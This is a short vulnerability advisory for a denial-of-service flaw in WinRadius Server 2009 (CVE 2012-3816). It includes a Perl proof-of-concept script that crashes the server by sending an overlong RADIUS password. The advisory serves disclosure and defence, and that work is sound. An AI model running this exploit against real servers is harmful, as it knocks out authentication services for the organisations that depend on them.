WinRadius Server Denial Of Service Vulnerability

Summary

WinRadius Server 2009 suffers from denial of service vulnerability

Credit:

The information has been provided by demonalex.


Details

Vulnerable Systems:
 * WinRadius Server 2009

WinRadius server would bind udp port 1812 and 1813, but it does not validate the password option size leading to a Denial Of Service flaw while sending more than 240 characters to it.

Proof Of Concept :

#!/usr/bin/perl
use Authen::Simple::RADIUS;
$|=1;
$host=shift || die ‘usage: $0 hostn’;
print ‘Launch Attack … n’;
$username=int(rand(10)).int(rand(10)).int(rand(10));
$password=’A’x241;
$secret=int(rand(10)).int(rand(10)).int(rand(10));
$radius = Authen::Simple::RADIUS->new(
host => $host,
secret => $secret
);
$radius->authenticate( $username, $password );
print ‘Finish!n’;
exit(1);

CVE Information:
2012-3816

Disclosure Timeline:
Published: 2012-05-29

Categories: Exploits